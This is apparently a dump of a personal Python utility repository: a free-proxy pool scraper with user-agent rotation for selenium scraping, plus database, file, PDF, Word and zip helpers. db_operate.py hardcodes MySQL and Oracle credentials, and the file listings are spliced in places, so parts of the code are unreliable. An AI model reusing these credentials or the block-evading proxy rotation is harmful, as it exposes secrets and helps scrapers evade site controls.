    def analysis_page(self, req):
        """Parse one listing page into 'scheme://host:port' strings, keeping
        only entries whose speed and connect time are both under 0.5 s."""
        result_ip_pool = []
        soup = bs(req.text, "lxml")
        ips = soup.find_all("tr")
        for i in range(1, len(ips)):  # row 0 is the table header
            try:
                tds = ips[i].find_all("td")
                temp_ip = str(tds[5].contents[0]).lower() + '://' + tds[1].contents[0] + ':' + tds[2].contents[0]
                speed = float(tds[6].div.get("title")[:-1])
                connect_time = float(tds[7].div.get("title")[:-1])
                if speed < 0.5 and connect_time < 0.5:
                    result_ip_pool.append(temp_ip)
            except Exception:
                # BUG FIX: traceback.format_exc() takes no exception argument
                # and its return value was being discarded; log it instead.
                logging.error("解析IP参数异常!\n%s", traceback.format_exc())
        return result_ip_pool

    def get_ip_pool(self):
        """Harvest proxies from NUM_OF_PAGES random listing pages."""
        result_ip_pool = []
        # BUG FIX: call helpers on self instead of re-instantiating RandomIp()
        # per call (every instantiation re-fetched random headers).
        target_pages = self.get_target_pages(self.MAX_PAGE_OF_XICI)
        for one_page in target_pages:
            one_page_url = self.XICI_URL + str(one_page)
            req = self.request_get(one_page_url)
            if req.status_code == 200:
                result_ip_pool.extend(self.analysis_page(req))
            else:
                logging.error("连接异常!异常url:%s", one_page_url)
        return result_ip_pool

    def review_ip_pool(self):
        """Re-validate every pooled proxy against TEST_URL and rewrite the
        pool file with only the proxies that still answer."""
        ip_pool_path = self.IP_POOL_FILE
        try:
            with open(ip_pool_path, "r", encoding="utf-8") as f:
                content = f.read()
            # Pool file holds str(list); strip "['" / "']" and split entries.
            ip_pool = content[2:len(content) - 2].split("', '")
            reduce_num = 0
            logging.info("IP池中待验证个数:{}".format(len(ip_pool)))
            for ip in ip_pool[:]:  # iterate a copy; entries are removed below
                proxy = {ip.split("://")[0]: ip.split("://")[1]}
                try:
                    req = requests.get(self.TEST_URL, proxies=proxy, headers=self.headers, timeout=3)
                    if req.status_code != 200:
                        ip_pool.remove(ip)
                        reduce_num += 1
                    time.sleep(1)  # be polite to the test endpoint
                except Exception as e:
                    logging.error("ip异常:{},异常信息:{}".format(ip, str(e)))
                    ip_pool.remove(ip)
                    reduce_num += 1
                    continue
            logging.info("IP池中已验证个数:{},减少个数:{}个".format(len(ip_pool), reduce_num))
            with open(ip_pool_path, "w", encoding="utf-8") as f:
                f.write(str(ip_pool))
            logging.info("IP池已更新!")
        except Exception as e:
            logging.error("重新验证IP池异常!异常信息:{}".format(e))

    def write_ip_to_file(self):
        """Append a freshly harvested batch of proxies to the pool file."""
        try:
            # os.path.join replaces the Windows-only '\\' concatenation.
            file_name = os.path.join(os.path.dirname(__file__), self.IP_POOL_FILE)
            # BUG FIX: harvest once -- the original called get_ip_pool()
            # twice (once to write, once to log the count), scraping every
            # sampled page twice and logging the size of a different batch.
            new_ips = self.get_ip_pool()
            with open(file_name, "a+", encoding="utf-8") as f:
                f.write(str(new_ips))
            logging.info("写入IP {} 个结束!".format(len(new_ips)))
        except Exception:
            # BUG FIX: logging.error("msg:", e) passed an argument with no
            # placeholder, losing the exception; log the traceback properly.
            logging.error("IP写入文件异常!异常信息:\n%s", traceback.format_exc())

    def get_one_ip(self):
        """Return one random proxy string from the pool file."""
        try:
            file_name = os.path.join(os.path.dirname(__file__), self.IP_POOL_FILE)
            with open(file_name, "r", encoding="utf-8") as f:
                content = f.read()
            ip_list = content[1:len(content) - 1].split(", ")
            random_ip = random.choice(ip_list)  # choice() picks a single one
            logging.info("random_ip: %s", random_ip)
            return random_ip
        except Exception:
            logging.error("IP读入文件异常!异常信息:\n%s", traceback.format_exc())

    def get_one_proxies(self):
        """Return one random proxy as a requests-style proxies dict."""
        try:
            file_name = os.path.join(os.path.dirname(__file__), self.IP_POOL_FILE)
            with open(file_name, "r", encoding="utf-8") as f:
                content = f.read()
            ip_list = content[2:len(content) - 2].split("', '")
            random_ip = random.choice(ip_list)
            proxies = {"http": random_ip}
            logging.info("proxies: %s", str(proxies))
            return proxies
        except Exception:
            logging.error("IP读入文件异常!异常信息:\n%s", traceback.format_exc())

    def get_num_of_ip(self, num_of_ip):
        """Return *num_of_ip* distinct random proxies from the pool file."""
        try:
            file_name = os.path.join(os.path.dirname(__file__), self.IP_POOL_FILE)
            with open(file_name, "r", encoding="utf-8") as f:
                content = f.read()
            cont_list = content.split("', '")
            ip_list = cont_list[1:len(cont_list) - 1]
            random_ip_list = random.sample(ip_list, num_of_ip)  # sample() picks several
            logging.info("random_ip_list: %s", random_ip_list)
            return random_ip_list
        except Exception:
            logging.error("IP读入文件异常!异常信息:\n%s", traceback.format_exc())


if __name__ == '__main__':
    RandomIp().write_ip_to_file()
    RandomIp().review_ip_pool()
201 | 202 | -------------------------------------------------------------------------------- /practice/technique/config/test_comfig.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 17:49 8 | @File : test_comfig.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import random_ip 16 | import user_agent 17 | 18 | # 文件中写入IP 19 | random_ip.RandomIp().write_ip_to_file() 20 | 21 | # 重新验证IP 22 | random_ip.RandomIp().review_ip_pool() 23 | 24 | # 获取随机一个IP 25 | random_ip.RandomIp().get_one_ip() 26 | 27 | # 获取随机一个prop 28 | random_ip.RandomIp().get_one_proxies() 29 | 30 | # 获取随机的多个IP 31 | random_ip.RandomIp().get_num_of_ip(5) 32 | 33 | # 获取随机userAgent 34 | user_agent.UserAgent().get_user_agent() 35 | 36 | # 获取随机headers 37 | user_agent.UserAgent().get_headers() 38 | -------------------------------------------------------------------------------- /practice/technique/db_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 数据库相关操作 6 | 1. 操作 MySQL 7 | 2. 操作 Oracle 8 | 3. 操作 MongoDB 9 | 4. 导出 MySQL 数据至 excel 10 | 5. 
import re
import json
import cx_Oracle
import xlrd
from pathlib import Path
import pymysql
import time


def create_mysql_connect():
    """
    Open a MySQL connection to the local `page_log` schema.
    :return: (cursor, connection); autocommit is switched on.
    """
    conn = pymysql.connect(
        host='localhost',
        user='root',
        passwd='123456789',
        db='page_log',
        port=3306,
        charset='utf8'
    )
    cur = conn.cursor()
    conn.autocommit(1)
    return cur, conn


def close_connect(conn):
    """Commit pending work on *conn* and close it."""
    conn.commit()
    conn.close()


class Mysql():
    pass


class Oracle():
    pass


class Mongodb():
    pass


class Trans():
    """Demo import/export jobs between flat files and databases."""

    def __init__(self):
        self.jsonPath = "json2mongo.json"
        self.mysqlPath = "csv2mysql.csv"
        self.oraclePath = "csv2oracle.csv"
        # Connection string user/password@host:port/service (see DB properties
        # dialog for the exact values, e.g. localhost:1521/orcl).
        self.oracle_localhost = cx_Oracle.connect(
            'app_common_service/Tebon@20180522@192.168.2.49:1521/orcl')

    def csv2oracle(self):
        """
        Query demo rows from Oracle and print them.
        :return: None
        """
        print("connect to oracle...")
        # 1. use the connection opened in __init__
        conn = self.oracle_localhost
        cursor = conn.cursor()
        try:
            # 2. query data
            sql = "select * from KCB_INFO_AND_LISTED_INFO where row_count =1"
            cursor.execute(sql)
            for data in cursor.fetchall():  # cursor.fetchone() for a single row
                print(data)
            conn.commit()
        except Exception:
            # BUGFIX: the original bare `except:` could reference `conn`
            # before assignment; now only the connection we hold is rolled back.
            conn.rollback()
        finally:
            # BUGFIX: always release the cursor/connection (the original
            # leaked both whenever the query raised).
            cursor.close()
            conn.close()


if __name__ == '__main__':
    # BUGFIX: the original ran `trans = trans()` at import time — a NameError,
    # the class is `Trans`. Guarded so importing the module is side-effect free.
    trans = Trans()
    # trans.json2mongodb()
    # trans.csv2mysql()
    trans.csv2oracle()
删除列 45 | df = df.drop(['id'], axis=1) 46 | # 删除多列(列集合) 47 | df = df.drop(columns=['B', 'C']) 48 | 49 | 50 | 51 | 52 | # # 数据统计 53 | # # 读取前五条数据 54 | # df.head() 55 | # # 读取某列 56 | # created_time = df['created_time'] 57 | # for one_time in created_time: 58 | # date = one_time.split(" ")[0] 59 | # time = one_time.split(" ")[1] 60 | # print(date, time) 61 | -------------------------------------------------------------------------------- /practice/technique/file_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 文件相关常用操作 6 | 1. 获取指定目录及其子目录下,所有指定后缀的文件的绝对路径 7 | 2. 遍历指定目录下(不包含子目录)所有文件,更新指定后缀 8 | 3. 判断指定文件是否是指定后缀的文件 9 | 4. 获取当前文件路径 10 | 5. 获取目录层级 11 | 6. 组合文件路径 12 | 7. 流式分块读取大文件 13 | 14 | 注:os 模块;path 模块;pathlib 库(重点); 15 | -------------------------------- 16 | @Time : 2019/5/25 22:28 17 | @File : file_operate.py 18 | @Software: PyCharm 19 | -------------------------------- 20 | @Author : lixj 21 | @contact : lixj_zj@163.com 22 | """ 23 | 24 | import os 25 | from pathlib import Path 26 | import pathlib 27 | import os.path 28 | from functools import partial 29 | 30 | 31 | def get_suffix_file_path(dir_path, suffix): 32 | """ 33 | 获取指定目录及其子目录下,所有指定后缀的文件的绝对路径 34 | :param dir_path: 指定目录 eg. "D:\\ZX\\temp" 35 | :param suffix: 指定后缀 eg. "txt" 36 | :return: 37 | """ 38 | file_list = [] 39 | for root, dirs, files in os.walk(dir_path): 40 | for file in files: 41 | if str(file).endswith(suffix): 42 | file_list.append(os.path.join(root, file)) 43 | return file_list 44 | 45 | 46 | def rename_file_suffix(dir_path, old_suffix, new_suffix): 47 | """ 48 | 遍历指定目录下(不包含子目录)所有文件,更新指定后缀 49 | :param dir_path: 指定路径 eg. "F:\\temp" 50 | :param old_suffix: 待修改后缀 eg. "txt" 51 | :param new_suffix: 新后缀 eg. "jpg" 52 | :return: 53 | """ 54 | for file_path in Path(dir_path).glob('*.' + old_suffix): 55 | file_path.rename(file_path.with_suffix("." 
+ new_suffix)) 56 | 57 | 58 | def is_suffix_file(file, suffix): 59 | """ 60 | 判断指定文件是否是指定后缀的文件 61 | :param file: 指定文件 eg. "F:\\temp\\img.txt" or "demo.txt" 62 | :param suffix: 指定后缀 eg. "txt" 63 | :return: True or False 64 | """ 65 | return pathlib.PurePath(file).match('*.' + suffix) 66 | 67 | 68 | def get_current_working_directory(): 69 | """ 70 | 获取当前文件路径 71 | :return: 72 | """ 73 | print(os.path.dirname(__file__)) 74 | print(os.getcwd()) 75 | print(pathlib.Path.cwd()) 76 | 77 | 78 | def get_upper_two_levels(): 79 | """ 80 | 获取目录层级 -- 获取上上层目录 81 | :return: 82 | """ 83 | print(os.path.dirname(os.path.dirname(os.getcwd()))) 84 | print(pathlib.Path.cwd().parent.parent) 85 | 86 | 87 | def combined_path(): 88 | """ 89 | 获取目录层级 -- 在上上层目录下拼接路径 90 | :return: 拼接结果 91 | """ 92 | # os 模块 93 | print(os.path.join(os.path.dirname(os.path.dirname(os.getcwd())), "1", "2", "3")) 94 | 95 | # Path 模块 96 | parts = ["1", "2", "3"] 97 | print(pathlib.Path.cwd().parent.parent.joinpath(*parts)) 98 | 99 | 100 | def get_file_path(): 101 | """ 102 | 组合文件路径 103 | :return: 104 | """ 105 | # 旧方法 106 | print(os.path.join('/temp', 'foo.txt')) 107 | # output: '/temp/foo.txt' 108 | 109 | # 新方法 110 | print(Path('/temp') / 'foo.txt') 111 | 112 | 113 | def read_file(file_name): 114 | """ 115 | 快速读取文件 116 | :param file_name: 文件名 117 | :return: 118 | """ 119 | # 标准做法 120 | with open(file_name) as f: 121 | f.read() 122 | 123 | # pathlib 模块,封装了 with open() 方法 124 | Path(file_name).read_text() 125 | 126 | 127 | def read_big_file_by_line(): 128 | """ 129 | 流式逐行读取大文件(常规做法) 130 | :return: 131 | """ 132 | # with 上下文管理器会自动关闭打开的文件描述符 133 | # 在迭代文件对象时,内容是一行一行返回的,不会占用太多内存 134 | # 缺点:大文本只有一行,所有内容读入内存 135 | with open("foo.txt") as f: 136 | for line in f: 137 | print(line) 138 | 139 | 140 | def read_big_file_by_chunk(file_path): 141 | """ 142 | 流式分块读取大文件 143 | :param file_path: 文件路径 144 | :return: 145 | """ 146 | # 普通做法 147 | with open(file_path) as file: 148 | for chunk in chunked_file_reader(file): 149 | yield 
chunk 150 | 151 | # 优秀做法 152 | with open(file_path) as file: 153 | for chunk in chunked_file_reader_mod(file): 154 | yield chunk 155 | 156 | 157 | def chunked_file_reader(file, block_size=1024 * 8): 158 | """ 159 | 流式分块读取大文件(普通做法) 160 | :param file: 文件名,即 with open(file_name) as file: 161 | :param block_size: 分块大小 162 | :return: 163 | """ 164 | while True: 165 | chunk = file.read(block_size) 166 | if not chunk: 167 | break 168 | yield chunk 169 | 170 | 171 | def chunked_file_reader_mod(file, block_size=1024 * 8): 172 | """ 173 | 流式分块读取大文件(优秀做法) 174 | :param file: 文件名,with open(file_name) as file: 175 | :param block_size: 分块大小 176 | :return: 177 | """ 178 | # 首先使用 partial(fp.read, block_size) 构造一个新的无需参数的偏函数 179 | # 循环将不断返回 fp.read(block_size) 调用结果,直到其为 '' 时终止 180 | for chunk in iter(partial(file.read, block_size), ''): 181 | yield chunk 182 | -------------------------------------------------------------------------------- /practice/technique/pdf_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : pdf相关的操作 6 | -------------------------------- 7 | @Time : 2019/5/25 10:39 8 | @File : pdf_operate.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | from PyPDF2 import PdfFileWriter, PdfFileReader 16 | import os 17 | import comDocOperate 18 | 19 | 20 | class PdfOperate(): 21 | def __init__(self): 22 | pass 23 | 24 | def get_limit_page_pdf(self, pdf_path, start_page, end_page): 25 | """ 26 | 截取pdf中的几页,输出到同目录 27 | :param pdf_path: 28 | :param start_page: 29 | :param end_page: 30 | :return: 31 | """ 32 | output = PdfFileWriter() 33 | pdf_file = PdfFileReader(open(pdf_path, "rb")) 34 | 35 | # 保存input.pdf中的start_page-end_page页到output.pdf 36 | for i in range(start_page, end_page): 37 | output.addPage(pdf_file.getPage(i)) 38 | 39 | 
output_stream = open(str(os.path.dirname(pdf_path)) + os.path.sep + "output.pdf", "wb") 40 | output.write(output_stream) 41 | output_stream.close() 42 | 43 | def merge_pdf(self, file_dir, outfile): 44 | """ 45 | 合并同一目录下的所有PDF文件 46 | :param filepath: 存放PDF的原文件夹 47 | :param outfile: 输出的PDF文件的名称 48 | :return: 49 | """ 50 | output = PdfFileWriter() 51 | output_pages = 0 52 | pdf_file_name = comDocOperate.getSameEndsFileInDir(file_dir, ".pdf") 53 | 54 | if pdf_file_name: 55 | for pdf_file in pdf_file_name: 56 | # 读取源PDF文件 57 | input = PdfFileReader(open(pdf_file, "rb")) 58 | # 获得源PDF文件中页面总数 59 | page_count = input.getNumPages() 60 | output_pages += page_count 61 | print("{pdfFile}文件页数:{page_count}". 62 | format(pdfFile=pdf_file, page_count=page_count)) 63 | 64 | # 分别将page添加到输出output中 65 | for one_page in range(page_count): 66 | output.addPage(input.getPage(one_page)) 67 | print("合并后的总页数:{pages}".format(pages=output_pages)) 68 | 69 | # 写入到目标PDF文件 70 | output_stream = open(os.path.join(file_dir, outfile), "wb") 71 | output.write(output_stream) 72 | output_stream.close() 73 | print("PDF文件合并完成!") 74 | else: 75 | print("没有可以合并的PDF文件!") 76 | 77 | 78 | if __name__ == '__main__': 79 | # 开始页 80 | start_page = 0 81 | # 截止页 82 | end_page = 5 83 | # 84 | pdf_path = r"D:\ZX\temp\test\1\0.pdf" 85 | 86 | pdf_operate = PdfOperate() 87 | # pdfOper.get_limit_page_pdf(pdf_path, start_page, end_page) 88 | 89 | file_dir = r'D:\ZX\temp\test\1' # 存放PDF的原文件夹 90 | outfile = "out.pdf" # 输出的PDF文件的名称 91 | pdf_operate.merge_pdf(file_dir, outfile) 92 | -------------------------------------------------------------------------------- /practice/technique/selenium_template.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/7/20 15:03 8 | @File : selenium_template.py 9 | @Software: PyCharm 10 | 
-------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | from selenium import webdriver 16 | from comConfig.user_agent import UserAgent 17 | from comConfig.random_ip import RandomIp 18 | 19 | 20 | class SeleniumTemp: 21 | def __init__(self): 22 | self.chrome_options = webdriver.ChromeOptions() 23 | self.chrome_options.add_argument('--headless') 24 | self.chrome_options.add_argument('--disable-gpu') 25 | # 指定 chromedriver.exe 文件路径 26 | self.executable_path = "D:\ZX_workspace\Python\otherfiles\chromedriver\chromedriver.exe" 27 | 28 | def selenium_operate(self): 29 | """ 30 | 加载 chrome driver,每次加载时更新 IP 与 useragent 31 | :return: driver 32 | """ 33 | # 有代理 IP 时加载 34 | # self.chrome_options.add_argument('--proxy-server=http://{}'.format(RandomIp().get_one_ip())) 35 | self.chrome_options.add_argument('--user-agent=' + UserAgent().get_user_agent()) 36 | return webdriver.Chrome(chrome_options=self.chrome_options, executable_path=self.executable_path) 37 | 38 | def get_page_source(self, driver, url): 39 | """ 40 | 获取页面全部内容 41 | :param driver: 42 | :param url: 43 | :return: 44 | """ 45 | driver.get(url) 46 | return driver.page_source 47 | 48 | if __name__ == '__main__': 49 | url = "http://exam.sac.net.cn/pages/registration/sac-finish-person.html?r2SS_IFjjk=8E0DEB6C9FC3F295E053D651A8C05FCD" 50 | selenium_temp = SeleniumTemp() 51 | driver = selenium_temp.selenium_operate() 52 | data = selenium_temp.get_page_source(driver, url) 53 | print(data) 54 | -------------------------------------------------------------------------------- /practice/technique/test_data/test.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/8/4 17:04 8 | @File : test.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | 
@contact : lixj_zj@163.com 13 | """ 14 | 15 | # -*- coding:utf-8 -*- 16 | 17 | import pandas as pd 18 | import numpy as np 19 | import seaborn as sns 20 | import matplotlib.pyplot as plt 21 | from pandas import DataFrame, Series 22 | # from sklearn.cross_validation import train_test_split 23 | from sklearn.linear_model import LinearRegression 24 | 25 | # 读取文件 26 | datafile = 'test_excel.xlsx' # 文件所在位置,u为防止路径中有中文名称,此处没有,可以省略 27 | data = pd.read_excel(datafile) # datafile是excel文件,所以用read_excel,如果是csv文件则用read_csv 28 | examDf = DataFrame(data) 29 | 30 | # 数据清洗,比如第一列有可能是日期,这样的话我们就只需要从第二列开始的数据, 31 | # 这个情况下,把下面中括号中的0改为1就好,要哪些列取哪些列 32 | new_examDf = examDf.ix[:, 1:] 33 | 34 | # 检验数据 35 | print(new_examDf.describe()) # 数据描述,会显示最值,平均数等信息,可以简单判断数据中是否有异常值 36 | print(new_examDf[new_examDf.isnull() == True].count()) # 检验缺失值,若输出为0,说明该列没有缺失值 37 | 38 | # 输出相关系数,判断是否值得做线性回归模型 39 | print(new_examDf.corr()) # 0-0.3弱相关;0.3-0.6中相关;0.6-1强相关; 40 | 41 | # 通过seaborn添加一条最佳拟合直线和95%的置信带,直观判断相关关系 42 | # sns.pairplot(data, x_vars=['visitor_id'], y_vars='created_time', height=7, aspect=0.8, kind='reg') 43 | -------------------------------------------------------------------------------- /practice/technique/test_data/test_excel.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/practice/technique/test_data/test_excel.xlsx -------------------------------------------------------------------------------- /practice/technique/word_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : word相关的文件操作 6 | 参考链接: 7 | https://www.cnblogs.com/ontheway703/p/5266041.html 8 | https://blog.csdn.net/xtfge0915/article/details/83479922 9 | -------------------------------- 10 | @Time : 2019/5/25 10:39 11 | @File : word_operate.py 12 | 
@Software: PyCharm 13 | -------------------------------- 14 | @Author : lixj 15 | @contact : lixj_zj@163.com 16 | """ 17 | 18 | from docx import * 19 | import re 20 | from docx.shared import Pt 21 | from docx.shared import Inches 22 | from win32com import client 23 | from docx.enum.style import WD_STYLE_TYPE 24 | import os, zipfile, shutil 25 | 26 | 27 | class WordOperate(): 28 | def __init__(self): 29 | pass 30 | 31 | def show_style(self): 32 | """ 33 | 查看word常用样式,在读取或写入时设置 34 | :return: 35 | """ 36 | doc = Document() 37 | styles = doc.styles 38 | 39 | # 查看段落样式 40 | for s in styles: 41 | if s.type == WD_STYLE_TYPE.PARAGRAPH: 42 | print("段落样式:", s.name) 43 | 44 | # 查看字符样式 45 | for s in styles: 46 | if s.type == WD_STYLE_TYPE.CHARACTER: 47 | print("字符样式:", s.name) 48 | 49 | # 查看表格样式 50 | for s in styles: 51 | if s.type == WD_STYLE_TYPE.TABLE: 52 | print("表格样式:", s.name) 53 | 54 | def set_style(self): 55 | """ 56 | word中设置样式 57 | :return: 58 | """ 59 | document = Document() 60 | 61 | # 1.段落设置样式 62 | paragraph = document.add_paragraph() 63 | paragraph.style = document.styles['Heading 1'] # style选取 64 | paragraph.style = 'Heading 1' # 用样式名称直接赋值 65 | paragraph2 = document.add_paragraph(style='Body Text') # 创建段落时赋值 66 | 67 | # 2.设置段落中的字符格式,定义样式中的字符格式后,所有运用此样式的段落都有相应的字符格式 68 | # 从样式库中选取 'Normal' 样式,并提取 'Normal' 样式的字符属性 69 | style = document.styles['Normal'] 70 | font = style.font 71 | # 设置样式中的字符属性 ,操作方法和上面改变内联对象属性方法一致 72 | font.name = "Microsoft YaHei UI" 73 | font.size = Pt(50) # 字体大小 74 | # 将设置好字符属性的样式运用到段落中 75 | p = document.add_paragraph("change font attribution", style='Normal') 76 | 77 | # 3.设置段落格式,定义样式中的段落格式后,所有运用此样式的段落都有相应的段落格式 78 | styles = document.styles 79 | # 选取 style,并设置 style 中的段落格式 80 | style = styles['Heading 2'] 81 | para_format = style.paragraph_format 82 | para_format.left_indent = Pt(20) 83 | para_format.widow_control = True 84 | # 将设置好段落格式的 style 运用到段落中 85 | p = document.add_paragraph('This is Heading, level 1', style=style) 86 | 87 | def 
get_head(self, doc_path): 88 | """ 89 | 读取 word 标题 90 | :param doc_path: 文档路径 91 | :return: 92 | """ 93 | doc = Document(doc_path) 94 | for p in doc.paragraphs: 95 | # 遍历1、2、3级标题 96 | if p.style.name == 'Heading 1': 97 | print(p.text) 98 | if p.style.name == 'Heading 2': 99 | print(p.text) 100 | if p.style.name == 'Heading 3': 101 | print(p.text) 102 | 103 | # 遍历所有标题 104 | for p in doc.paragraphs: 105 | if re.match("^Heading \d+$", p.style.name): 106 | print(p.text) 107 | 108 | def get_content(self, doc_path): 109 | """ 110 | 读取 word 内容 111 | :param doc_path: 文档路径 112 | :return: 113 | """ 114 | doc = Document(doc_path) 115 | # 读取正文 116 | for p in doc.paragraphs: 117 | if p.style.name == 'Normal': 118 | print(p.text) 119 | 120 | def write_content(self, result_doc_path): 121 | """ 122 | doc写入文件 123 | :param result_doc_path: 写入 word 文档路径 124 | :return: 125 | """ 126 | doc = Document() 127 | # 写入标题 128 | doc.add_heading("heading 1", level=1) 129 | doc.add_paragraph("heading 1", style='Heading 1') 130 | 131 | # 写入正文 132 | doc.add_paragraph("正文") 133 | 134 | # 写入分页符 135 | doc.add_page_break() 136 | 137 | # 写入表格 138 | table = doc.add_table(rows=1, cols=3, style="Light List Accent 5") 139 | hdr_cells = table.rows[0].cells 140 | hdr_cells[0].text = 'testName' 141 | hdr_cells[1].text = 'param' 142 | hdr_cells[2].text = 'exc' 143 | 144 | # 写入图片 145 | doc.add_picture("imgName", width=Inches(1.5)) # 设置宽度 146 | 147 | doc.save(result_doc_path) 148 | 149 | def get_img_from_doc(self, doc_path): 150 | """ 151 | 从word中提取图片到对应目录img文件夹 152 | word转zip-提取midea中的word-复制到新目录并重命名同名为文件夹-zip还原成word,删除word文件夹 153 | :param docdir: word 路径 154 | :return: 155 | """ 156 | # 切换路径 157 | doc_abs_path = os.path.abspath(os.path.dirname(doc_path) + os.path.sep + ".") 158 | os.chdir(doc_abs_path) 159 | 160 | # 遍历文件 161 | for file in os.listdir(doc_abs_path): 162 | if file.endswith("docx"): # 匹配docx文件 163 | doc_name = file.split(".") # 以“.”做成列表形式 164 | os.rename(file, 
"{docName}.ZIP".format(docName=doc_name[0])) # 重命名为ZIP格式 165 | f = zipfile.ZipFile("{docName}.ZIP".format(docName=doc_name[0]), 'r') 166 | for file in f.namelist(): 167 | if "word" in file: 168 | f.extract(file) # 将压缩包里的word文件夹解压 169 | f.close() 170 | old_img_dir = r"{absPath}\word\media".format(absPath=doc_abs_path) # 定义图片文件夹 171 | shutil.copytree(old_img_dir, "{absPath}\{docName}".format(absPath=doc_abs_path, 172 | docName=doc_name[0])) # 拷贝到新目录,名称为word文件的名字 173 | os.rename("{docName}.ZIP".format(docName=doc_name[0]), 174 | "{docName}.docx".format(docName=doc_name[0])) # 将ZIP名字还原为DOCX 175 | shutil.rmtree("{absPath}\word".format(absPath=doc_abs_path)) # 删除word文件夹 176 | else: 177 | print(file, "非docx文件!") 178 | 179 | def word_to_pdf(self, doc_path): 180 | """ 181 | word 转换成 pdf 182 | :param doc_path: docx 文件路径 183 | :return: 184 | """ 185 | # 切换路径 186 | doc_abs_path = os.path.abspath(os.path.dirname(doc_path) + os.path.sep + ".") 187 | os.chdir(doc_abs_path) 188 | dir_list = os.listdir(doc_abs_path) 189 | for file in dir_list: 190 | if file.endswith("docx"): # 匹配docx文件 191 | word = client.DispatchEx("Word.Application") 192 | base_name = os.path.basename(file).split('.')[0] 193 | word_file = word.Documents.Open(os.path.abspath(file), ReadOnly=1) 194 | word_file.SaveAs(doc_abs_path + os.path.sep + str(base_name) + ".pdf", FileFormat=17) 195 | word_file.Close() 196 | else: 197 | print(file, "非docx文件!") 198 | 199 | 200 | if __name__ == '__main__': 201 | root_doc_path = r'D:\ZX\temp\test\1\test.docx' 202 | result_doc_path = r"C:\Users\Tebon\Desktop\test\result.docx" 203 | word_oper = WordOperate() 204 | word_oper.get_content(root_doc_path) 205 | word_oper.write_content(result_doc_path) 206 | word_oper.show_style() 207 | word_oper.get_img_from_doc(root_doc_path) 208 | word_oper.word_to_pdf(root_doc_path) 209 | -------------------------------------------------------------------------------- /practice/technique/zip_file_operate.py: 
-------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : zip 文件常用操作 6 | -------------------------------- 7 | @Time : 2019/8/13 15:24 8 | @File : test_zip.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import zipfile 16 | import os 17 | 18 | def unzip_file(zip_file_name, unzip_path): 19 | """ 20 | 解压 zip 文件。(注:解压文件路径下包含同名称待解压文件,会覆盖!) 21 | :param zip_file_name: 解压文件的名称,含路径全地址 22 | :param dic_path: 解压文件路径 23 | """ 24 | if zipfile.is_zipfile(zip_file_name): 25 | archive = zipfile.ZipFile(zip_file_name, mode='r') 26 | for file in archive.namelist(): 27 | archive.extract(file, unzip_path) 28 | else: 29 | print("{} is not zip file.".format(zip_file_name)) 30 | 31 | 32 | def get_zip_file_name(dic_path): 33 | """ 34 | 将指定的 zip 文件内容解压到指定路径中 35 | :param dic_path: 指定路径 36 | :return: 压缩文件全路径 37 | """ 38 | zip_file_path = [] 39 | for root, dirs, files in os.walk(dic_path): 40 | for file in files: 41 | if os.path.splitext(file)[1] == '.zip': # 读取zip文件 42 | zip_file_path.append(os.path.join(root, file)) 43 | return zip_file_path 44 | 45 | 46 | if __name__ == '__main__': 47 | zip_file_path = "E:\\zip" # zip file 路径 48 | upzip_file_path = "E:\\zip\\res" # 解压路径 49 | 50 | fn = get_zip_file_name(zip_file_path) 51 | for file in fn: 52 | unzip_file(file, upzip_file_path) 53 | 54 | -------------------------------------------------------------------------------- /project_directory_structure.txt: -------------------------------------------------------------------------------- 1 | projectName/ 2 | |-- bin/ 或script/之类,存放项目的一些可执行文件,但bin/更直观。 3 | | |-- __init__ 4 | |  |-- start.py 启动主程序,入口文件 5 | | 6 | |-- core/ 存放项目的所有源代码(核心代码)。 7 | | (1) 源代码中的所有模块、包都应该放在此目录。不要置于顶层目录。 8 | | (2) 程序的入口最好命名为main.py。 9 | | |-- tests/ 子目录tests/存放单元测试代码; 10 | | | |-- __init__.py 11 | | | |-- 
